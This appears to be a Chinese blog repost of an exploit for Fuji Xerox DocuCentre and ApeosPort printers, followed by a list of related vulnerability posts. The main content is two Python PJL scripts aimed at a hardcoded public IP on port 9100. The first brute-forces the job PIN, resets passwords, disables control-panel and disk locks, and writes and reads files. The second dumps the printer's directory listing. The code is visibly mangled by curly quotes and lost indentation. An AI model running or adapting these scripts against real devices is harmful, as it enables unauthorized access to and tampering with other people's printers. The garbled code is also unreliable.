直接上代码:

Exploit Title: FUJI XEROX DocuCentre-V 3065 Printer - Remote Command Execution

Date: 2018-09-05

Exploit Author: vr_system

Vendor Homepage: https://www.fujixerox.com.cn/

Software Link: https://www.fujixerox.com.cn/

Version: DocuCentre-IV,DocuCentre-VI,DocuCentre-V,ApeosPort-VI,ApeosPort-V

Tested on: DocuCentre-V 3065,ApeosPort-VI C3371,ApeosPort-V C4475,ApeosPort-V C3375,DocuCentre-VI C2271,ApeosPort-V C5576,DocuCentre-IV C2263,DocuCentre-V C2263,ApeosPort-V 5070

CVE : N/A

POC:Ability to write files to the printer

#!/usr/bin/env python

-- coding: UTF-8 --

import socket
import time
PJL_START = "\033%-12345X@PJL "
PJL_FINISH = “\033%-12345X\r\n”

def Buildsocket(ip,port=9100):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock.settimeout(5)
try:
sock.connect((ip, port))
except:
print “[!*]-ip-%s-can’t connect–” % ip
return ‘error’
for i in range(500):
print"bypass pin:{0}".format(i)
PJL_INFO_ID = “”“JOB PASSWORD={0}\r\n”"".format(i)
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH
sock.send(DEVICEID)
PJL_INFO_ID = “”“DEFAULT PASSWORD=0\r\n”""
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH
sock.send(DEVICEID)

PJL_INFO_ID = """DEFAULT CPLOCK=OFF\r\n"""
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH
sock.send(DEVICEID)
PJL_INFO_ID = """DEFAULT DISKLOCK=OFF\r\n"""
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH
sock.send(DEVICEID)  PJL_INFO_ID = """FSDOWNLOAD FORMAT:BINARY SIZE=4 NAME="0:/test4"\r\n"""
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH
sock.send(DEVICEID)
try:device = sock.recv(1024)
except:pass
PJL_INFO_ID = """FSUPLOAD NAME="0:/test4" OFFSET=0 SIZE=4\r\n"""
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH
sock.send(DEVICEID)
try:device = sock.recv(1024)
except:pass
finally:sock.close()
print "OK"

if name == ‘main’:
ip = “118.42.125.192”
Buildsocket(ip, port=9100)

POC:Ability to view files in the printer

##!/usr/bin/env python

-- coding: UTF-8 --

import socket
PJL_START = "\033%-12345X@PJL "
PJL_FINISH = “\033%-12345X\r\n”

def Buildsocket(ip, port=9100):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock.settimeout(5)
try:
sock.connect((ip, port))
except:
print “[!]-ip-%s-can’t connect–" % ip
return ‘error’
PJL_INFO_ID = “”“FSDIRLIST NAME=“0:/” ENTRY=1 COUNT=65535"”"
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH
sock.send(DEVICEID)
try:
device = sock.recv(1024)
except:pass
PJL_INFO_ID = “”“FSDIRLIST NAME=“0:/” ENTRY=1"”"
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH
sock.send(DEVICEID) #
try:
device = sock.recv(1024)
except:
return ‘No’
print "[!
]-ip-%s-is-ok\r\ndeviceidis-%s” % (str(ip), device)
sock.close()
return ‘OK’
if name == ‘main’:
Buildsocket(“118.42.125.192”, port=9100)

富士施乐 DocuCentre-V 3065 打印机远程命令执行漏洞相关推荐

  1. Fastjson远程命令执行漏洞总结

    1.FastJson 简介 fastjson.jar包原始下载地址:https://github.com/alibaba/fastjson fastjson用于将Java Bean序列化为JSON字符 ...

  2. webmin远程命令执行漏洞(cve-2019-15107)深入分析

    漏洞描述 近日Webmin被发现存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件. Webmin是目前功能最强大的基于Web的Unix系统管理工具.管理员通过浏览器访问Webmin的 ...

  3. 【注意】关于Redis存在远程命令执行漏洞的安全公告

    点击蓝色"程序猿DD"关注我 回复"资源"获取独家整理的学习资料! 来源:CNVD漏洞平台 安全公告编号:CNTA-2019-0024 2019年7月10日,国 ...

  4. rmi远程反序列化rce漏洞_Oracle WebLogic 反序列化远程命令执行漏洞预警

    报告编号:B6-2019-041901 报告来源:360-CERT 报告作者:360-CERT 更新日期:2019-04-19 0x00 事件背景 2019年4月17日,国家信息安全漏洞共享平台(CN ...

  5. jenkins java反序列化_Jenkins “Java 反序列化”过程远程命令执行漏洞

    ###漏洞原理 反序列化是指特定语言中将传递的对象序列化数据重新恢复为实例对象的过程,而在这个过程中会执行一系列的字节流解析和对象实例化操作用于恢复之前序列化时的对象.在原博文所提到的那些 Java ...

  6. ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程命令执行漏洞

    ThinkPHP 5.0.x.5.1.x.5.2.x 全版本远程代码执行漏洞 漏洞概述: ThinkPHP是一个快速.兼容而且简单的轻量级国产PHP开发框架.借鉴Struts框架的Action对象,同 ...

  7. 远程执行漏洞修复方案_请马上修复!SaltStack远程命令执行漏洞

    [漏洞预警]SaltStack远程命令执行漏洞(CVE-2020-11651.CVE-2020-11652) 2020年5月3日,阿里云应急响应中心监测到近日国外某安全团队披露了SaltStack存在 ...

  8. 又被野外利用了!新曝光Office产品多个远程命令执行漏洞分析

    本文讲的是又被野外利用了!新曝光Office产品多个远程命令执行漏洞分析, 早在2015年,FireEye曾发布过两次关于Office的Encapsulated PostScript (EPS)图形文 ...

  9. 详述WebLogic反序列化远程命令执行漏洞的处理过程,云和恩墨技术通讯精选

    各位亲爱的用户/读者朋友们: 为了及时共享行业案例,通告共性问题,达成知识共享和提前预防,我们整理和编辑了<云和恩墨技术通讯>(5月刊),通过对过去一段时间的知识回顾和故障归纳,以期提供有 ...

  10. 紧急:Spring框架被爆出存在0day级别远程命令执行漏洞。漏洞危害程度不亚于log4j漏洞根据目前掌握的信息,JDK版本在9及以上的Spring框架均受影响。该漏洞目前无官方修复补丁

    Spring框架被爆出存在0day级别远程命令执行漏洞.漏洞危害程度不亚于log4j漏洞根据目前掌握的信息,JDK版本在9及以上的Spring框架均受影响. 漏洞信息和漏洞影响排查方法如下: 漏洞名称 ...

最新文章

  1. 【鸿蒙 HarmonyOS】UI 组件 ( Button 组件 )
  2. android canvas bitmap matrix,Canvas API详解(Part 3)Matrix和drawBitmapMash
  3. Qt Creator将应用程序部署到QNX Neutrino设备
  4. CodeReview学习与总结
  5. CentOS 6 安装Hadoop 2.6 (三)问题收集
  6. MFC通过对话框窗口句柄获得对话框对象指针
  7. 利用数组实现栈java,用java编写出来:用数组实现一个栈
  8. 数仓系列 | 深入解读 Flink 资源管理机制
  9. 什么是代理服务器?【2022版指南】
  10. java从网页上导出表格,如何从网页将表格导出到Excel
  11. 【翻译】PSV初音Miku Project DIVA-f
  12. Masscan——端口扫描
  13. python将网页转换为图片保存
  14. 基因结构图的0_在线网站绘制基因结构图!
  15. matlab 复数夹角如何求,matlab钟输入一个复数,如何输出复数的模和相角?
  16. 海归35岁,阿里P7offer, 是否接受?
  17. vue中使用防抖和截流
  18. 周末作业-循环练习题(2)
  19. 网络工程师----成长之路
  20. object-position/object-fit

热门文章

  1. python程序设计基础与应用课后答案_智慧职教Python程序设计基础作业课后答案
  2. upf模板,来自synopsys rm golden.upf
  3. 【elementui】颜色选择器
  4. Ubuntu18网络配置
  5. matlab使用xlsread读取excel时报错/错误使用xlsread/matlab读取数据莫名其妙的错误
  6. SQL注入学习之union联合查询注入
  7. 感知特性评价指标SSIM
  8. 基于Java毕业设计幼儿园教育管理信息系统演示2021源码+系统+mysql+lw文档+部署软件
  9. 阳光动力2号太阳能飞机的基本工作原理
  10. 大厂面试八股文——数据库mysql